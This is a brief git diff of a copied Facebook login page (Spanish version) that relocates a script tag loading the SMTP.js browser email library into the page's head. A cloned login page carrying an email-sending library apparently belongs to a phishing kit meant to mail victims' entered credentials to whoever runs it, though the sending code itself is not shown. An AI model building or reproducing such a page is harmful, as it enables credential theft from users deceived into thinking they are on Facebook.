--- a/www.facebook.com/index.html
+++ b/www.facebook.com/index.html
@@ -1,8 +1,8 @@
-﻿<script src="https://smtpjs.com/v3/smtp.js">
+﻿F<!DOCTYPE html> <html lang="es" id="facebook" class="no_js"> <head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script>window._cstart=+new Date();
 </script>
-
-F<!DOCTYPE html> <html lang="es" id="facebook" class="no_js"> <head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script>window._cstart=+new Date();
-</script><script>function envFlush(a) {
+<script src="https://smtpjs.com/v3/smtp.js">
+</script>
+<script>function envFlush(a) {
     function b(b) {
         for(var c in a)b[c]=a[c]
     }
